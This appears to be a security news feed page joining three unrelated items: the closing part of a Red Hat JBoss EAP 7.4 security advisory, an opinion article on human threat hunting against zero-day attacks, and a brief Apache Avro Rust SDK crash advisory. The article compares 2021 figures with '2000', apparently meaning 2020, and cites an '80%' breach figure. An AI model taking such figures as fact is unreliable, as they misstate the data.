JBEAP-23559 - [GSS](7.4.z) Upgrade Undertow from 2.2.17.SP4-redhat-00001 to 2.2.18.SP1  
JBEAP-23561 - [SET](7.4.z) Upgrade PicketLink bindings from 2.5.5.SP12-redhat-00013 to 2.5.5.SP12-redhat-00014  
JBEAP-23566 - [GSS](7.4.z) Upgrade Hibernate ORM from 5.3.26.Final-redhat-00002 to 5.3.27.Final  
JBEAP-23571 - [GSS](7.4.z) Upgrade Elytron from 1.15.12.Final-redhat-00001 to 1.15.13.Final-redhat-00001  
JBEAP-23626 - (7.4.z) Upgrade PicketBox from 5.0.3.Final-redhat-00008 to 5.0.3.Final-redhat-00009  
JBEAP-23659 - [GSS](7.4.z) Upgrade wildfly-http-ejb-client from 1.1.11.SP1 to 1.1.12.SP1  
JBEAP-23671 - (7.4.z) Upgrade Netty from 4.1.72.Final-redhat-00001 to 4.1.77.Final-redhat-00001 and netty-tcnative from 2.0.48.Final-redhat-00001 to 2.0.52.Final-redhat-00001  
JBEAP-23686 - (7.4.z) Upgrade Jackson Databind from 2.12.6.1.redhat-00003 to 2.12.6.1.redhat-00004  
JBEAP-23726 - (7.4.z) Upgrade OpenSSL Natives from 2.2.0.Final-redhat-00002 to 2.2.2.Final  
JBEAP-23728 - (7.4.z) Upgrade OpenSSL from 2.2.0.Final-redhat-00002 to 2.2.3.Final  
JBEAP-23806 - [QA](7.4.z) Upgrade Undertow from 2.2.18.SP1-redhat-00001 to 2.2.18.SP2  
JBEAP-23807 - (7.4.z) Upgrade WildFly Core from 15.0.14.Final-redhat-00001 to 15.0.15.Final-redhat-00001

6. References:

https://access.redhat.com/security/cve/CVE-2021-44906  
https://access.redhat.com/security/cve/CVE-2022-24823  
https://access.redhat.com/security/cve/CVE-2022-25647  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches&product=appplatform&version=7.4  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYvGk4tzjgjWX9erEAQiKbA/6A/Pa2YVD6tUX9//4blHjQdTIt2kGnHhr  
aPCer60Ipdde3dTKNUxrlA7nOa+4+l7d8GQM6LWnqQoD3LO6IJbo8qNBMJbToPb6  
VTwrR0c/DDDW1wk+8zmG5XQYPrqMwoUwcjU0Bm/h7e5mtdnDikeEFkW7GY5DS9q0  
z2snlF21QI6mIa8V+E8rJjl0u0QCt5OtUNYThK3UhRSvCb51gWWKlRBUHQSeEPR4  
WElUSxtbCWy4HFtFDA2qNe7s1s+oV9iI0pUQeCp317ryj5M+cwykf/ygFAMrhP0o  
n4nYOP1fAPzlebLjzHIoVQq8yIkmxyPWPUpS0z9kX0x/5Mb6iHQjxyDq8uWLUp34  
DxKVgPtstKipaXVldTMVeWm9wKrDP+iPubm7zzUhUrkWJxOcdn8KR3oErGX+iWHa  
Gm1VC/NVrTK13N96Oasanq8wnagnT0aoxNzFQffd+YOe+Oq6FtSh3gAfrCuihFHe  
XwFp0nx6Efw+GINFvRPhqz72k+sN6IUwyzLwhqubBU0wtTbw/y6u6mWgFcV0DZpI  
QEvSFoLykl/8nL0RzTjGwlCrym87l5BMQ9NgDXUYc3TspW+knUHHIxISDUAF675d  
inw9DuVnfC8jzuO+XO8gC6DYk3ubhk2cnb4RtUDFXgEevP+vWfHBnzvlboZwym8n  
Kv169btRFYw=  
=H6VV  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5928-01

Machine-learning algorithms alone may miss signs of a successful attack on your organization.

Zero-day attacks that exploit unpatched software vulnerabilities saw exponential growth last year. According to cybersecurity researchers like the Zero-Day Tracking Project, 2021 saw more than 80 zero-day exploits recorded, versus 36 in 2000. There are already 22 such exploits on record for the first half of 2022.

As soon as a vulnerability becomes known, cybercriminals rush to exploit it before the software developer can write, test, and release a patch. That window may be hours, but more likely days or weeks long. So, it's important that you have threat hunters — humans, not machine-learning algorithms — scouring your infrastructure proactively for signs of a successful attack.

The risk of falling victim to a zero-day attack is considerable, and the consequences real. One study from the Ponemon Institute found that 80% of successful data breaches originated with zero-day exploits. The vulnerabilities exploited are found in software common to the enterprise, including Microsoft Windows and Office, Google Chrome, Adobe Reader, Apple iOS, and Linux.

With 2021's Apache Log4j Java-based vulnerability, we can add hundreds of millions of devices and a wide range of websites, consumer and enterprise services, and applications to the list.

Step one in protecting every organization is to practice excellent IT hygiene — keep up to date on patching and updating all software. It's the back-to-basics measure that so many companies love to overlook or postpone. Granted, it can be time and resource consuming to test and deploy software patches, and the process can disrupt business operations. But it's a critical safeguard and far less costly than a data breach.

**The Invisibility of Newness**

A strong perimeter and signature-based edge controls like anti-virus software and intrusion prevention do not provide complete protection. That's because they can only detect known threats. They are blind to the footprints of zero-day attacks, when the cybercriminals are the first to uncover and exploit a software vulnerability. That's why zero-day exploit kits carry very high price tags on the black market, running from tens of thousands of dollars up to millions. They work that well.

Once a cybercriminal has used a zero-day exploit to penetrate a network unseen, they can take their time and deploy their weapon of choice, from viruses and worms to malware and ransomware to remote code execution. They can move laterally in the network, steal identities, and steal data. As long as you don't know they're there, it's like handing over the keys to the crown jewels.

**The Role of Threat Hunting**

It's that invisibility that makes proactive threat hunting an essential component of the layered approach to security. It's made possible in part because we have been smart about using machine learning to free up scarce cybersecurity people resources by reducing the number of alerts needing human intervention by 90%. Some in the industry have taken this success to mean that humans can be phased out of the security equation by algorithms, and that algorithms can do the work for us, including threat hunting.

Machine learning does bring significant advantages to cybersecurity management, but it will never completely replace humans in the security operations center. Machines handle high-volume tasks like eliminating false positives and repetitions extremely well. Machine learning may assist when you are hunting for known threats, including advanced and "low-and-slow" threats, where you know what indicators of compromise (IoCs) to look for.

However, human intelligence, intuition, strategic thinking, and creative problem solving are essential in proactive zero-day threat hunting where the IoCs are unknown and the hunter is looking for the subtle indications that another human is maliciously active in your environment.

This approach is research intensive. The analyst may create a hypothesis and then validate it based on observed patterns or anomalous activity in security data logs and user and entity behavioral analysis (UEBA) logs. According to CISA, these can include failed file modifications, increased CPU activity, inability to access files, unusual network communications, compromised administrator privileges, credentials theft, increases in database read volumes, and irregular geographical access.

Companies can develop threat hunting skills in-house or acquire them as a managed service. Either way, these human defenders and their proactive threat hunting expertise are the new elites in the security industry. Supported by comprehensive log data, threat intelligence, and tools like the MITRE ATT&CK knowledge base, human threat hunters are essential to combatting zero-day attacks, multistage attacks, and devious, low-and-slow hackers.

Human Threat Hunters Are Essential to Thwarting Zero-Day Attacks

It is possible to crash (panic) an application by providing a corrupted data to be read. This issue affects Rust applications using Apache Avro Rust SDK prior to 0.14.0 (previously known as avro-rs). Users should update to apache-avro version 0.14.0 which addresses this issue.

Tag

#apache